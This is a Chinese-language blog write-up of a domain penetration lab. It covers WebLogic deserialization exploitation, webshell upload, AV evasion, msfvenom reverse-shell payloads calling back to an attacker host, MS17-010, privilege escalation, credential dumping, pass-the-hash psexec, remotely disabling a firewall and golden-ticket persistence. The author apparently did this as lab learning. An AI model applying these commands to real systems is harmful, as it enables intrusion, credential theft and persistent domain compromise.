记一次内网渗透靶场学习

2022-03-30 22:16:09 浏览数 (2)

环境搭建

web:

外网ip - 192.168.10.80

内网ip - 10.10.10.80

PC:

外网ip - 192.168.10.201

内网ip - 10.10.10.201

DC:

内网ip - 10.10.10.10

web、PC、DC都处于同一域环境内,需要手动开启weblogic服务

外网

端口探测

首先nmap扫描一下端口发现了1433端口判断是sql server,另外一个特征端口就是7001端口,判断为weblogic端口

代码语言:txt复制
nmap -T4 -sC -sV 192.168.10.80
image-20210707193456627.pngimage-20210707193456627.png

weblogic getshell

这里访问一下weblogic所在的7001端口,注意这里直接访问7001端口会显示404,这里直接访问192.168.10.80:7001/console即可

image-20210707193541891.pngimage-20210707193541891.png

首先尝试一下控制台弱口令weblogic weblogic无果

image-20210707193601504.pngimage-20210707193601504.png

这里直接使用weblogic漏洞检测工具,也可以使用weblogic批量扫描脚本去扫描,扫描发现存在几个反序列化漏洞

image-20210707193803883.pngimage-20210707193803883.png

这里我是用CVE-2017-10271进行命令执行发现为administrator权限

image-20210707193824312.pngimage-20210707193824312.png

查看ip情况为双网卡,初步判断有域环境

image-20210707193844656.pngimage-20210707193844656.png

tasklist /svc查看一下进程发现了360主动防御,那么后面的马就需要做免杀处理

image-20210707193902665.pngimage-20210707193902665.png

这里直接使用漏扫工具中自带的jsp马先上传进行尝试

image-20210707193934151.pngimage-20210707193934151.png

访问一下能够访问到,那么已经上传成功

image-20210707193959396.pngimage-20210707193959396.png

使用蚁剑尝试连接失败,这里我觉得可能是有360的原因,而jsp的马在蚁剑默认是没有加密解密器的,所以应该是被360给拦了

image-20210707194110828.pngimage-20210707194110828.png

这里我换一个冰蝎的马传上去试试

image-20210707194156414.pngimage-20210707194156414.png

使用冰蝎连接成功

image-20210707194241888.pngimage-20210707194241888.png

初步做一下信息搜集,发现DNS为de1ay.com,应该这个就是域的名称

image-20210707194405981.pngimage-20210707194405981.png

上线msf

这里首先生成一个msf的马

代码语言:txt复制
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.10.30 lport=4444 -f exe > msf.exe
image-20210707194527522.pngimage-20210707194527522.png

使用冰蝎上传到靶机上

image-20210707194612575.pngimage-20210707194612575.png

执行一下,这里因为有360的原因使用msf的原生马是不能够上线的,会被360拦截

image-20210707194842917.pngimage-20210707194842917.png

这里我后面使用了一下混淆进行了初步免杀处理,然后上线到了msf

image-20210707195135482.pngimage-20210707195135482.png

内网渗透

socks代理扫描内网

这里首先添加一个10.10.10.0/24段的路由,方便后续操作

代码语言:txt复制
route add 10.10.10.0 255.255.255.0 1

route print
image-20210707195212367.pngimage-20210707195212367.png

使用socks路由把msf带入内网,需要在proxychains.conf里面添加路由

代码语言:txt复制
use auxiliary/server/socks4a

run
image-20210707195315930.pngimage-20210707195315930.png

这时候就可以使用msf中的udp_probe模块对10.10.10.0/24段的主机进行信息搜集,这里发现10段还有另外两台主机,10.10.10.10和10.10.10.201

image-20210707215623196.pngimage-20210707215623196.png

这里使用常规的nmap对这两个ip进行端口扫描发现什么都没有扫出来,那么这里应该是有防火墙的原因

image-20210707220400495.pngimage-20210707220400495.png

ms17-010

这里使用ms17-010模块首先对内网进行扫描一下能不能够通过漏洞直接进行横向移动,注意因为有360的原因这里线程不要调的太高

代码语言:txt复制
use auxiliary/scanner/smb/smb_ms17_010
set rhost 10.10.10.0/24
set threads 5
run

扫描完成后发现这里两台主机都可以利用永恒之蓝,就结束了(吗?)

image-20210707203431746.pngimage-20210707203431746.png

这里直接利用exp打一波,发现都打失败了,应该是没有开匿名管道的原因

代码语言:txt复制
use exploit/windows/smb/ms17_010_eternalblue
set rhosts 10.10.10.80
run
image-20210707203936194.pngimage-20210707203936194.png

msf派生cs会话

这里我在鼓捣半天之后使用getuid查看了一下当前的权限发现还只是一个user权限,也使用不了mimikatz,因为在cs上提权比较方便,这里就直接msf派生个对话给cs,在cs上进行提权操作

使用payload-inject把msf的对话派生给msf

代码语言:c 复制
use exploit/windows/local/payload_inject
set PAYLOAD windows/meterpreter/reverse_http
set DisablePayloadHandler true
set LHOST 192.168.1.5
set LPORT 5555
set SESSION 2
run
image-20210707211428347.pngimage-20210707211428347.png

这里在cs创建一个监听host为192.168.1.5,port为5555接受msf的对话

image-20210707211432290.pngimage-20210707211432290.png

查看下内网ip的信息,dns为10.10.10.10,那么10.10.10.10大概率为域控

image-20210707221739681.pngimage-20210707221739681.png

查看一下主机信息,证实了猜想

代码语言:txt复制
net computers
image-20210707221926832.pngimage-20210707221926832.png

权限提升

这里因为是一个user权限首先要进行提权操作,使用systeminfo查看补丁情况发现只打了3个补丁,那么可以提权的exp有很多

image-20210707212821344.pngimage-20210707212821344.png

这里使用ms14-058直接提权到system

image-20210707212907721.pngimage-20210707212907721.png

使用logonpasswords导出密码

image-20210707213444768.pngimage-20210707213444768.png

看到这里有一个SID为500的域管的帐号,那么直接可以用psexec进行hash传递横向移动

image-20210707213513490.pngimage-20210707213513490.png

横向移动

这里首先扫描一下网段下的主机

image-20210707215226861.pngimage-20210707215226861.png

和基本判断的一致,内网下有3台主机

image-20210707222112599.pngimage-20210707222112599.png

这里使用80主机进行psexec操作

image-20210707222133082.pngimage-20210707222133082.png

这里psexec执行了但是没有主机上线,这里想起来psexec是需要在防火墙关闭的情况下才能够进行pth的,所以这里尝试一下先ipc连接关闭防火墙后再进行psexec横向移动

image-20210707222309401.pngimage-20210707222309401.png

使用ipc与10.10.10.10进行连接

代码语言:txt复制
shell net use \10.10.10.10ipc$ 1qaz@WSX /user:Administrator
shell net use
image-20210707222548552.pngimage-20210707222548552.png

使用sc创建计划任务立即执行关闭域控防火墙

代码语言:txt复制
sc \10.10.10.10 create unablefirewall binpath= "netsh advfirewall set allprofiles state off"    
sc \10.10.10.10 start unablefirewall    

这里关闭之后psexec还是没有成功,是因为这里DC只有内网ip,所以这里需要用到web进行中转操作才能够上线cs

image-20210707222553760.pngimage-20210707222553760.png

这里我用到cs的smb beacon进行流量中转,首先建立监听一个smb beacon

image-20210707223442558.pngimage-20210707223442558.png

再使用smb beacon进行psexec

image-20210707223341691.pngimage-20210707223341691.png

即可上线DC

image-20210707223421795.pngimage-20210707223421795.png

这里因为拿到了域管的帐号,这里也使用psexec的方式上线cs,这里当时可以使用批量pth进行上线

image-20210707223656487.pngimage-20210707223656487.png

上线成功

image-20210707224258327.pngimage-20210707224258327.png

权限维持

这里使用到金票进行权限维持

首先hashdump出krbtgt的hash值

image-20210707224414333.pngimage-20210707224414333.png

查看一下SID

image-20210707224512621.pngimage-20210707224512621.png

在web主机上生成金票

image-20210707224936180.pngimage-20210707224936180.png

可以看到这里dir域控c盘成功

image-20210707225039985.pngimage-20210707225039985.png

0 人点赞